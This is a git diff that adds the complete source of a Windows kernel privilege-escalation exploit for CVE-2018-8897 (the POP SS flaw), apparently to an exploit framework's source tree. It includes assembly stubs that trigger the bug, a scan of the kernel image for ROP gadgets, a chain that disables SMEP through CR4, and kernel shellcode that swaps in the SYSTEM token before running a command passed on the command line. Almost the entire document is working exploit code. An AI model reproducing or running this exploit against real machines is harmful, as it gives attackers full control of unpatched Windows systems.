+
+#pragma data_seg(".LDATA$1")
+#pragma data_seg(".LDATA$2")
+#pragma data_seg(".LDATA$3")
+#pragma data_seg()
+
+#pragma code_seg(".LTEXT$1")
+#pragma code_seg(".LTEXT$2")
+#pragma code_seg(".LTEXT$3")
+#pragma code_seg()
+
+__declspec( allocate( ".LDATA$1" ) ) static char Np_DataStart = 0x0;
+__declspec( allocate( ".LDATA$3" ) ) static char Np_DataEnd = 0x0;
+
+__declspec( allocate( ".LTEXT$1" ) ) static char Np_TextStart = 0x0;
+__declspec( allocate( ".LTEXT$3" ) ) static char Np_TextEnd = 0x0;
+
+
+#define NON_PAGED_DATA  __declspec( allocate( ".LDATA$2" ) )
+#define NON_PAGED_CODE __declspec( code_seg( ".LTEXT$2" ) ) __declspec(noinline)
+#define NON_PAGED_LAMBDA(...)  []( __VA_ARGS__ ) NON_PAGED_CODE
+
+// Mini non-paged crt
+#define Np_memcpy(dst, src, size) __movsb( ( BYTE* ) dst, ( const BYTE* ) src, size )
+#define Np_memset(dst, val, size) __stosb( ( BYTE* ) dst, val, size)
+#define Np_ZeroMemory(dst, size) __stosb( ( BYTE* ) dst, 0, size)
+
+#pragma comment(linker,"/MERGE:.LDATA=.data")
+#pragma comment(linker,"/MERGE:.LTEXT=.text")
+
+// Routines to lock the pages
+static BOOL Np_TryIncreaseWorkingSetSize( SIZE_T Size )
+{
+	SIZE_T Min, Max;
+	if ( !GetProcessWorkingSetSize( NtCurrentProcess(), &Min, &Max ) )
+		return FALSE;
+	if ( !SetProcessWorkingSetSize( NtCurrentProcess(), Min + Size, Max + Size ) )
+		return FALSE;
+	return TRUE;
+}
+
+static BOOL Np_TryLockPage( PVOID Page )
+{
+	if ( !Np_TryIncreaseWorkingSetSize( 0x1000 ) )
+		return FALSE;
+	if ( VirtualLock( Page, 0x1000 ) )
+		return TRUE;
+	if ( !Np_TryIncreaseWorkingSetSize( 0x2000 ) )
+		return FALSE;
+	return VirtualLock( Page, 0x1000 );
+}
+
+static BOOL Np_LockRange( PVOID From, PVOID To )
+{
+	PBYTE FromPageAligned = ( PBYTE ) ( ( uintptr_t ) ( From ) & ( ~0xFFF ) );
+	PBYTE ToPageAligned = ( PBYTE ) ( ( uintptr_t ) ( To ) & ( ~0xFFF ) );
+
+	for ( PBYTE Current = FromPageAligned; Current <= ToPageAligned; Current += 0x1000 )
+	{
+		if ( !Np_TryLockPage( Current ) )
+		{
+			printf( "[+] Failed locking %16llx!\n", Current );
+			return FALSE;
+		}
+		else
+		{
+			printf( "[+] Locked %16llx successfully!\n", From );
+		}
+	}
+	return TRUE;
+}
+
+static BOOL Np_LockSections()
+{
+	printf( "[+] .LDATA: %16llx -> %16llx!\n", &Np_DataStart, &Np_DataEnd );
+	printf( "[+] .LTEXT: %16llx -> %16llx!\n", &Np_TextStart, &Np_TextEnd );
+
+	return
+		Np_LockRange( &Np_DataStart, &Np_DataEnd ) &&
+		Np_LockRange( &Np_TextStart, &Np_TextEnd );
+}
diff --git a/external/source/exploits/cve-2018-8897-exe/Native.asm b/external/source/exploits/cve-2018-8897-exe/Native.asm
new file mode 100644
index 0000000000..5797fe7e01
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/Native.asm
@@ -0,0 +1,146 @@
+.code
+	__swapgs PROC
+		swapgs
+		ret
+	__swapgs ENDP
+
+	__rollback_isr PROC
+		mov rdx, [rsp]          ; rdx = Return pointer
+		lea r8, [rsp+8h]        ; r8 = Old stack
+		mov [rcx], rdx          ; isr stack.rip = Return pointer
+		mov [rcx+18h], r8       ; isr stack.rsp = Old stack
+		mov rsp, rcx            ; stack = isr stack
+		iretq                   ; return
+	__rollback_isr ENDP
+		
+	__set_gs_base PROC
+		wrgsbase rcx
+		ret
+	__set_gs_base ENDP
+		
+	__readss PROC
+		xor eax, eax
+		mov ax, ss
+		ret
+	__readss ENDP
+
+	__read_gs_base PROC
+		rdgsbase rax
+		ret
+	__read_gs_base ENDP
+
+	__triggervuln PROC
+		mov [rcx+8*0], r12      ; save registers
+		mov [rcx+8*1], r13
+		mov [rcx+8*2], r14
+		mov [rcx+8*3], r15
+		mov [rcx+8*4], rdi
+		mov [rcx+8*5], rsi
+		mov [rcx+8*6], rbx
+		mov [rcx+8*7], rbp
+		mov [rcx+8*8], rsp
+		pushfq
+		pop [rcx+8*9]
+
+		mov ss, word ptr [rdx]  ; Defer debug exception
+		int 3                   ; Execute with interrupts disabled
+		nop
+		nop
+		nop
+		nop	
+
+		mov r12, [rcx+8*0]      ; load registers
+		mov r13, [rcx+8*1]
+		mov r14, [rcx+8*2]
+		mov r15, [rcx+8*3]
+		mov rdi, [rcx+8*4]
+		mov rsi, [rcx+8*5]
+		mov rbx, [rcx+8*6]
+		mov rbp, [rcx+8*7]
+		mov rsp, [rcx+8*8]
+		push [rcx+8*9]
+		popfq
+		ret
+	__triggervuln ENDP
+
+
+	__setxmm0 PROC
+		movups xmm0, [rcx]
+		ret
+	__setxmm0 ENDP
+
+	__setxmm1 PROC
+		movups xmm1, [rcx]
+		ret
+	__setxmm1 ENDP
+
+	__setxmm2 PROC
+		movups xmm2, [rcx]
+		ret
+	__setxmm2 ENDP
+
+	__setxmm3 PROC
+		movups xmm3, [rcx]
+		ret
+	__setxmm3 ENDP
+
+	__setxmm4 PROC
+		movups xmm4, [rcx]
+		ret
+	__setxmm4 ENDP
+
+	__setxmm5 PROC
+		movups xmm5, [rcx]
+		ret
+	__setxmm5 ENDP
+
+	__setxmm6 PROC
+		movups xmm6, [rcx]
+		ret
+	__setxmm6 ENDP
+
+	__setxmm7 PROC
+		movups xmm7, [rcx]
+		ret
+	__setxmm7 ENDP
+
+	__setxmm8 PROC
+		movups xmm8, [rcx]
+		ret
+	__setxmm8 ENDP
+
+	__setxmm9 PROC
+		movups xmm9, [rcx]
+		ret
+	__setxmm9 ENDP
+
+	__setxmm10 PROC
+		movups xmm10, [rcx]
+		ret
+	__setxmm10 ENDP
+
+	__setxmm11 PROC
+		movups xmm11, [rcx]
+		ret
+	__setxmm11 ENDP
+
+	__setxmm12 PROC
+		movups xmm12, [rcx]
+		ret
+	__setxmm12 ENDP
+
+	__setxmm13 PROC
+		movups xmm13, [rcx]
+		ret
+	__setxmm13 ENDP
+
+	__setxmm14 PROC
+		movups xmm14, [rcx]
+		ret
+	__setxmm14 ENDP
+
+	__setxmm15 PROC
+		movups xmm15, [rcx]
+		ret
+	__setxmm15 ENDP	
+end
diff --git a/external/source/exploits/cve-2018-8897-exe/Native.h b/external/source/exploits/cve-2018-8897-exe/Native.h
new file mode 100644
index 0000000000..e3383a06d0
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/Native.h
@@ -0,0 +1,30 @@
+#pragma once
+#include <Windows.h>
+#include <inttypes.h>
+
+extern "C"
+{
+	void     __setxmm0( BYTE* );
+	void     __setxmm1( BYTE* );
+	void     __setxmm2( BYTE* );
+	void     __setxmm3( BYTE* );
+	void     __setxmm4( BYTE* );
+	void     __setxmm5( BYTE* );
+	void     __setxmm6( BYTE* );
+	void     __setxmm7( BYTE* );
+	void     __setxmm8( BYTE* );
+	void     __setxmm9( BYTE* );
+	void     __setxmm10( BYTE* );
+	void     __setxmm11( BYTE* );
+	void     __setxmm12( BYTE* );
+	void     __setxmm13( BYTE* );
+	void     __setxmm14( BYTE* );
+	void     __setxmm15( BYTE* );
+
+	void     __swapgs();
+	uint16_t __readss();
+	PVOID    __read_gs_base();
+	void     __set_gs_base( PVOID GsBase );
+	void     __rollback_isr( uint64_t IsrStack );
+	void     __triggervuln( PVOID RegSave, PVOID Abc );
+};
diff --git a/external/source/exploits/cve-2018-8897-exe/NtDefines.h b/external/source/exploits/cve-2018-8897-exe/NtDefines.h
new file mode 100644
index 0000000000..f2c981e591
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/NtDefines.h
@@ -0,0 +1,72 @@
+#pragma once
+#include <Windows.h>
+
+#pragma pack(push, 8)
+typedef struct _SYSTEM_MODULE_ENTRY
+{
+	HANDLE Section;
+	PVOID MappedBase;
+	PVOID ImageBase;
+	ULONG ImageSize;
+	ULONG Flags;
+	USHORT LoadOrderIndex;
+	USHORT InitOrderIndex;
+	USHORT LoadCount;
+	USHORT OffsetToFileName;
+	UCHAR FullPathName[ 256 ];
+} SYSTEM_MODULE_ENTRY, *PSYSTEM_MODULE_ENTRY;
+
+typedef struct _SYSTEM_MODULE_INFORMATION
+{
+	ULONG Count;
+	SYSTEM_MODULE_ENTRY Module[ 0 ];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+typedef struct _UNICODE_STRING
+{
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING;
+
+typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION
+{
+	struct
+	{
+		ULONG KvaShadowEnabled : 1;
+		ULONG KvaShadowUserGlobal : 1;
+		ULONG KvaShadowPcid : 1;
+		ULONG KvaShadowInvpcid : 1;
+		ULONG Reserved : 28;
+	} KvaShadowFlags;
+} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;
+
+typedef UNICODE_STRING *PUNICODE_STRING;
+#pragma pack(pop)
+
+#define NtCurrentProcess() ( HANDLE(-1) )
+#define SeLoadDriverPrivilege 10ull
+#define SystemModuleInformation 0xBull
+#define SystemKernelVaShadowInformation 196ull
+#define AdjustCurrentProcess 0ull
+#define STATUS_SUCCESS 0
+
+using fnFreeCall = uint64_t( __fastcall* )( ... );
+
+template<typename ...Params>
+static NTSTATUS __NtRoutine( const char* Name, Params &&... params )
+{
+	auto fn = ( fnFreeCall ) GetProcAddress( GetModuleHandleA( "ntdll.dll" ), Name );
+	return fn( std::forward<Params>( params ) ... );
+}
+
+#define NtQuerySystemInformation(...) __NtRoutine("NtQuerySystemInformation", __VA_ARGS__)
+#define RtlAdjustPrivilege(...) __NtRoutine("RtlAdjustPrivilege", __VA_ARGS__)
+#define NtUnloadDriver(...) __NtRoutine("NtUnloadDriver", __VA_ARGS__)
+#define NtLoadDriver(...) __NtRoutine("NtLoadDriver", __VA_ARGS__)
+
+static BOOL AcquirePrivilege( DWORD Privilage, DWORD Proc )
+{
+	BOOLEAN Enabled = 0;
+	return !RtlAdjustPrivilege( Privilage, 1ull, Proc, &Enabled ) || Enabled;
+}
diff --git a/external/source/exploits/cve-2018-8897-exe/README.md b/external/source/exploits/cve-2018-8897-exe/README.md
new file mode 100644
index 0000000000..885a698532
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/README.md
@@ -0,0 +1,12 @@
+# CVE-2018-8897
+Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
+- KVA Shadowing should be disabled and [the relevant security update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897) should be uninstalled.
+- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. 
+
+## Detailed explanation:
+
+https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
+
+## Result:
+![](https://blog.can.ac/wp-content/uploads/2018/05/K1DL2.png)
+![](https://blog.can.ac/wp-content/uploads/2018/05/aF6dL.png)
diff --git a/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.cpp b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.cpp
new file mode 100755
index 0000000000..4275bc74b4
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.cpp
@@ -0,0 +1,387 @@
+#include <iostream>
+#include <Windows.h>
+#include <intrin.h>
+#include "KernelRoutines.h"
+#include "LockedMemory.h"
+#include "Native.h"
+#include "Error.h"
+
+struct ISR_STACK
+{
+	uint64_t RIP;
+	uint64_t CS;
+	uint64_t EF;
+	uint64_t RSP;
+};
+
+// Doensn't really change
+static const uint32_t Offset_Pcr__Self = 0x18;
+static const uint32_t Offset_Pcr__CurrentPrcb = 0x20;
+static const uint32_t Offset_Pcr__Prcb = 0x180;
+static const uint32_t Offset_Prcb__CurrentThread = 0x8;
+static const uint32_t Offset_Context__XMM13 = 0x270;
+static const uint32_t MxCsr__DefVal = 0x1F80;
+static const uint32_t Offset_Prcb__RspBase = 0x28;
+static const uint32_t Offset_KThread__InitialStack = 0x28;
+static const uint32_t Offset_Prcb__Cr8 = 0x100 + 0xA0;
+static const uint32_t Offset_Prcb__Cr4 = 0x100 + 0x18;
+
+// Requires patterns
+NON_PAGED_DATA static uint32_t Offset_Prcb__Context = 0x0;                   // @KeBugCheckEx
+NON_PAGED_DATA static uint32_t Offset_KThread__ApcStateFill__Process = 0x0;  // @PsGetCurrentProcess
+
+NON_PAGED_DATA uint64_t ContextBackup[ 10 ];
+
+NON_PAGED_DATA fnFreeCall k_PsDereferencePrimaryToken = 0;
+NON_PAGED_DATA fnFreeCall k_PsReferencePrimaryToken = 0;
+NON_PAGED_DATA fnFreeCall k_PsGetCurrentProcess = 0;
+NON_PAGED_DATA uint64_t* k_PsInitialSystemProcess = 0;
+
+NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;
+
+using fnIRetToVulnStub = void( * )( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );
+NON_PAGED_DATA BYTE IRetToVulnStub[] = 
+{
+	0x0F, 0x22, 0xE1,		// mov cr4, rcx ; cr4 = original cr4
+	0x48, 0x89, 0xD4,		// mov rsp, rdx ; stack = isr stack
+	0x4C, 0x89, 0xC1,		// mov rcx, r8  ; rcx = ContextBackup
+	0xFB,				// sti          ; enable interrupts
+	0x48, 0x31, 0xC0,               // xor rax, rax ; lower irql to passive_level 
+	0x44, 0x0F, 0x22, 0xC0,         // mov cr8, rax
+	0x48, 0xCF			// iretq        ; interrupt return
+};
+
+NON_PAGED_DATA uint64_t PredictedNextRsp = 0;
+NON_PAGED_DATA ptrdiff_t StackDelta = 0;
+
+NON_PAGED_CODE void KernelShellcode()
+{
+	__writedr( 7, 0 );
+
+	uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
+	__writecr4( Cr4Old & ~( 1 << 20 ) );
+
+	__swapgs();
+
+	// Uncomment if it bugchecks to debug:
+	// __writedr( 2, StackDelta );
+	// __writedr( 3, PredictedNextRsp );
+	// __debugbreak();
+	// ^ This will let you see StackDelta and RSP clearly in a crash dump so you can check where the process went bad
+	
+	uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;
+
+	// Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
+	while ( 
+		( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
+		( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
+	{
+
+		__rollback_isr( IsrStackIterator );
+
+		// We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
+		if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
+		{
+			/*
+			fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
+			fffff00e`d7a1bc40 0000000000000010 
+			fffff00e`d7a1bc48 0000000000000002 
+			fffff00e`d7a1bc50 fffff00ed7a1bc68 
+			fffff00e`d7a1bc58 0000000000000000 
+			fffff00e`d7a1bc60 0000000000000014 
+			fffff00e`d7a1bc68 00007ff7e2261e95 --
+			fffff00e`d7a1bc70 0000000000000033 
+			fffff00e`d7a1bc78 0000000000000202 
+			fffff00e`d7a1bc80 000000ad39b6f938 
+			*/
+			IsrStackIterator = IsrStackIterator + 0x30;
+			break;
+		}
+
+		IsrStackIterator -= StackDelta;
+	}
+
+
+	PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
+	Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );
+
+	// ------ KERNEL CODE ------
+
+	uint64_t SystemProcess = *k_PsInitialSystemProcess;
+	uint64_t CurrentProcess = k_PsGetCurrentProcess();
+
+	uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
+	uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );
+
+	for ( int i = 0; i < 0x500; i += 0x8 )
+	{
+		uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );
+
+		if ( ( Member & ~0xF ) == CurrentToken )
+		{
+			*( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
+			break;
+		}
+	}
+
+
+	k_PsDereferencePrimaryToken( CurrentToken );
+	k_PsDereferencePrimaryToken( SystemToken );
+
+	// ------ KERNEL CODE ------
+
+	__swapgs();
+
+	( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
+	( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
+}
+
+PUCHAR AllocateLockedMemoryForKernel( SIZE_T Sz )
+{
+	PUCHAR Va = ( PUCHAR ) VirtualAlloc( 0, Sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
+	ZeroMemory( Va, Sz );
+	for ( int i = 0; i < Sz; i += 0x1000 )
+		Np_TryLockPage( Va + i );
+	return Va;
+}
+
+int main(int argc, char *argv[])
+{
+	if (argc < 2){
+		return 0;
+	}
+	// Pre-init checks: KVA Shadow
+	SYSTEM_KERNEL_VA_SHADOW_INFORMATION KvaInfo = { 0 };
+	if ( !NtQuerySystemInformation( SystemKernelVaShadowInformation, &KvaInfo, ( uint64_t ) sizeof( KvaInfo ), 0ull ) )
+		assert( !KvaInfo.KvaShadowFlags.KvaShadowEnabled );
+
+	// Initialization: Memory allocation, locking sections, loading nt
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
+	
+	assert( Np_LockSections() );
+	assert( Np_TryLockPage( &__rollback_isr ) );
+	assert( Np_TryLockPage( &__swapgs ) );
+
+	KernelContext* KrCtx = Kr_InitContext();
+	assert( KrCtx );
+
+	static PUCHAR Pcr = AllocateLockedMemoryForKernel( 0x10000 );
+	static PUCHAR KThread = AllocateLockedMemoryForKernel( 0x10000 );
+	static PUCHAR KProcess = AllocateLockedMemoryForKernel( 0x10000 );
+	static PUCHAR Prcb = Pcr + Offset_Pcr__Prcb;
+
+
+	// Offsets: Finding offsets and ROP gadgets
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xB );
+
+	PIMAGE_DOS_HEADER DosHeader = ( PIMAGE_DOS_HEADER ) KrCtx->NtLib;
+	PIMAGE_NT_HEADERS FileHeader = ( PIMAGE_NT_HEADERS ) ( ( uint64_t ) DosHeader + DosHeader->e_lfanew );
+	PIMAGE_SECTION_HEADER SectionHeader = ( PIMAGE_SECTION_HEADER ) ( ( ( uint64_t ) &FileHeader->OptionalHeader ) + FileHeader->FileHeader.SizeOfOptionalHeader );
+	while ( _strcmpi( ( char* ) SectionHeader->Name, ".text" ) ) SectionHeader++;
+
+	uint64_t AdrRetn = 0;
+	uint64_t AdrPopRcxRetn = 0;
+	uint64_t AdrSetCr4Retn = 0;
+
+	PUCHAR NtBegin = ( PUCHAR ) KrCtx->NtLib + SectionHeader->VirtualAddress;
+	PUCHAR NtEnd = NtBegin + SectionHeader->Misc.VirtualSize;
+
+	// Find [RETN]
+	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
+	{
+		if ( It[ 0 ] == 0xC3 )
+		{
+			AdrRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
+			break;
+		}
+	}
+
+	// Find [POP RCX; RETN]
+	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
+	{
+		if ( It[ 0 ] == 0x59 && It[ 1 ] == 0xC3 )
+		{
+			AdrPopRcxRetn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
+			break;
+		}
+	}
+
+	// Find [MOV CR4, RCX; RETN]
+	for ( PUCHAR It = NtBegin; It < NtEnd; It++ )
+	{
+		if ( It[ 0 ] == 0x0F && It[ 1 ] == 0x22 &&
+			 It[ 2 ] == 0xE1 && It[ 3 ] == 0xC3 )
+		{
+			AdrSetCr4Retn = It - ( PUCHAR ) KrCtx->NtLib + KrCtx->NtBase;
+			break;
+		}
+	}
+
+	printf( "[+] [RETN]                Gadget @ %16llx\n", AdrRetn );
+	printf( "[+] [POP RCX; RETN]       Gadget @ %16llx\n", AdrPopRcxRetn );
+	printf( "[+] [MOV CR4, RCX; RETN]  Gadget @ %16llx\n", AdrSetCr4Retn );
+
+	assert( AdrRetn );
+	assert( AdrPopRcxRetn );
+	assert( AdrSetCr4Retn );
+
+	PUCHAR UPsGetCurrentProcess = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "PsGetCurrentProcess" );
+	PUCHAR UKeBugCheckEx = ( PUCHAR ) GetProcAddress( KrCtx->NtLib, "KeBugCheckEx" );
+
+	for ( int i = 0; i < 0x50; i++ )
+	{
+		if ( UKeBugCheckEx[ i ] == 0x48 && UKeBugCheckEx[ i + 1 ] == 0x8B &&  // mov rax, 
+			 UKeBugCheckEx[ i + 7 ] == 0xE8 )                             // call
+		{
+			Offset_Prcb__Context = *( int32_t * ) ( UKeBugCheckEx + i + 3 );
+			break;
+		}
+	}
+
+	for ( int i = 0; i < 0x50; i++ )
+	{
+		if ( UPsGetCurrentProcess[ i ] == 0x48 && UPsGetCurrentProcess[ i + 1 ] == 0x8B &&  // mov rax, 
+			 UPsGetCurrentProcess[ i + 7 ] == 0xC3 )                                    // retn
+		{
+			Offset_KThread__ApcStateFill__Process = *( int32_t * ) ( UPsGetCurrentProcess + i + 3 );
+			break;
+		}
+	}
+
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
+	printf( "[+] Prcb.Context                 @ %16llx\n", Offset_Prcb__Context );
+	printf( "[+] KThread.ApcStateFill.Process @ %16llx\n", Offset_KThread__ApcStateFill__Process );
+
+	assert( Offset_Prcb__Context );
+	assert( Offset_KThread__ApcStateFill__Process );
+
+	// Setting up GSBASE
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xC );
+
+	*( PVOID* ) ( Pcr + Offset_Pcr__Self )				= Pcr;				// Pcr.Self
+	*( PVOID* ) ( Pcr + Offset_Pcr__CurrentPrcb )			= Pcr + Offset_Pcr__Prcb;	// Pcr.CurrentPrcb
+	*( DWORD* ) ( Prcb )						= MxCsr__DefVal;		// Prcb.MxCsr
+	*( PVOID* ) ( Prcb + Offset_Prcb__CurrentThread )		= KThread;			// Prcb.CurrentThread
+	*( PVOID* ) ( Prcb + Offset_Prcb__Context )			= Prcb + 0x3000;		// Prcb.Context, Placeholder
+	*( PVOID* ) ( KThread + Offset_KThread__ApcStateFill__Process ) = KProcess;			// EThread.ApcStateFill.EProcess
+	*( PVOID* ) ( Prcb + Offset_Prcb__RspBase )			= (PVOID) 1;			// Prcb.RspBase
+	*( PVOID* ) ( KThread + Offset_KThread__InitialStack )		= 0;				// EThread.InitialStack
+
+	printf( "[+] Finished setting up fake PCR!\n" );
+	printf( "[+] Pcr       @ %16llx\n", Pcr );
+	printf( "[+] Prcb      @ %16llx\n", Prcb );
+	printf( "[+] EThread   @ %16llx\n", KThread );
+	printf( "[+] EProcess  @ %16llx\n", KProcess );
+
+	NON_PAGED_DATA static DWORD SavedSS = __readss();
+
+	// Execute Exploit!
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
+
+	HANDLE ThreadHandle = CreateThread( 0, 0, [ ] ( LPVOID ) -> DWORD
+	{
+		volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );
+
+		while ( !Ctx->Rsp );						// Wait for RtlCaptureContext to be called once so we get leaked RSP
+		uint64_t StackInitial = Ctx->Rsp;
+		while ( Ctx->Rsp == StackInitial );				// Wait for it to be called another time so we get the stack pointer difference 
+										// between sequential KiDebugTrapOrFault's
+		StackDelta = Ctx->Rsp - StackInitial;
+		PredictedNextRsp = Ctx->Rsp + StackDelta;			// Predict next RSP value when RtlCaptureContext is called
+		uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;		// Predict where the return pointer will be located at
+		NextRetPtrStorage &= ~0xF;
+		*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;	
+		                                                                // Make RtlCaptureContext write XMM13-XMM15 over it
+		return 0;
+	}, 0, 0, 0 );
+
+	assert( ThreadHandle );
+	printf( "\n- Created context watchdog\n" );
+	printf( "- Thread Id:       %16llx\n", ( HANDLE ) GetThreadId( ThreadHandle ) );
+
+	assert( SetThreadPriority( ThreadHandle, THREAD_PRIORITY_TIME_CRITICAL ) );
+	printf( "- Elevated priority to: THREAD_PRIORITY_TIME_CRITICAL\n" );
+	SetThreadAffinityMask( ThreadHandle, 0xFFFFFFFE );
+	SetThreadAffinityMask( HANDLE( -2 ), 0x00000001 );
+	printf( "- Seperated exploit and context watchdog processors\n" );
+
+	k_ExAllocatePool = KrCtx->GetProcAddress<>( "ExAllocatePool" );
+	k_PsReferencePrimaryToken = KrCtx->GetProcAddress<>( "PsReferencePrimaryToken" );
+	k_PsDereferencePrimaryToken = KrCtx->GetProcAddress<>( "PsDereferencePrimaryToken" );
+	k_PsGetCurrentProcess = KrCtx->GetProcAddress<>( "PsGetCurrentProcess" );
+	k_PsInitialSystemProcess = KrCtx->GetProcAddress<uint64_t*>( "PsInitialSystemProcess" );
+
+	printf( "\n" );
+	printf( "- PsInitialSystemProcess:     %16llx\n", k_PsInitialSystemProcess );
+	printf( "- PsGetCurrentProcess:        %16llx\n", k_PsGetCurrentProcess );
+	printf( "- PsReferencePrimaryToken:    %16llx\n", k_PsReferencePrimaryToken );
+	printf( "- PsDereferencePrimaryToken:  %16llx\n", k_PsDereferencePrimaryToken );
+	printf( "- ExAllocatePool:             %16llx\n", k_ExAllocatePool );
+	printf( "\n" );
+
+	printf( "/--------------------------------------\\\n" );
+	printf( "| Press any key to start exploit!      |\n" );
+	printf( "| Warning: This may bugcheck your PC.  |\n" );
+	printf( "\\--------------------------------------/\n" );
+	//system( "pause>nul" );
+	printf( "\n" );
+
+	CONTEXT Ctx = { 0 };
+	Ctx.Dr0 = ( uint64_t ) &SavedSS;                        	// Trap SS
+	Ctx.Dr1 = ( uint64_t ) Prcb + Offset_Prcb__Cr8;         	// Trap KiSaveProcessorControlState, Cr8 storage
+	Ctx.Dr7 = 
+		( 1 << 0 ) | ( 3 << 16 ) | ( 3 << 18 ) |	// R/W, 4 Bytes, Active
+		( 1 << 2 ) | ( 3 << 20 ) | ( 2 << 22 );		// W,   8 Bytes,  Active
+	Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
+
+	printf( "[+] Setting up debug registers:\n" );
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
+	printf( "Dr0:    %16llx [@SavedSS]              (R/W, 4 Bytes, Active)\n", Ctx.Dr0 );
+	printf( "Dr1:    %16llx [@SpecialRegisters.CR4] (W,   8 Bytes, Active)\n", Ctx.Dr1 );
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
+	assert( SetThreadContext( HANDLE( -2 ), &Ctx ) );
+	printf( "\n" );
+
+	uint64_t RetnRetn[ 2 ] = { AdrRetn, AdrRetn };
+	uint64_t PopRcxRetnRcx[ 2 ] = { AdrPopRcxRetn, 0x506f8 };
+	uint64_t SetCr4Retn[ 2 ] = { AdrSetCr4Retn, ( uint64_t ) &KernelShellcode };
+
+	// RSP:
+	__setxmm13( ( BYTE* ) RetnRetn );		// &retn	// we need to align xmm writes so two place holders just incase!
+							// &retn
+	__setxmm14( ( BYTE* ) PopRcxRetnRcx );		// &pop rcx
+							// 0x506f8
+	__setxmm15( ( BYTE* ) SetCr4Retn );		// &mov cr4, rcx; retn
+							// &KernelShellcode
+
+	printf( "[+] Built ROP Chain:\n" );
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xD );
+	printf( "-- &retn;                (%016llx)\n", RetnRetn[ 0 ] );
+	printf( "-- &retn;                (%016llx)\n", RetnRetn[ 1 ] );
+	printf( "-- &pop rcx; retn;       (%016llx)\n", PopRcxRetnRcx[ 0 ] );
+	printf( "-- cr4_nosmep            (%016llx)\n", PopRcxRetnRcx[ 1 ] );
+	printf( "-- &mov cr4, rcx; retn;  (%016llx)\n", SetCr4Retn[ 0 ] );
+	printf( "-- &KernelShellcode      (%016llx)\n", SetCr4Retn[ 1 ] );
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
+	printf( "\n" );
+
+
+	PVOID ProperGsBase = __read_gs_base();
+	printf( "[+] Writing fake PCR as new GSBASE:  %16llx\n", Pcr );
+	printf( "[+] Defering debug exception...\n" );
+	__set_gs_base( Pcr );
+	__triggervuln( ContextBackup, &SavedSS ); // Let the fun begin
+	__set_gs_base( ProperGsBase );
+	printf( "[+] Restored old GSBASE:             %16llx\n", ProperGsBase );
+
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xA );
+	printf( "[+] Exploit successful!\n\n" );
+
+
+	SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 0xF );
+	printf( "/------------------------------------------\\\n" );
+	printf( "| Press any key to launch a system console |\n" );
+	printf( "\\------------------------------------------/" );
+	//system( "pause>nul" );
+	system( argv[1] );
+}
diff --git a/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.sln b/external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.sln
new file mode 100755
index 0000000000..217673bcdc
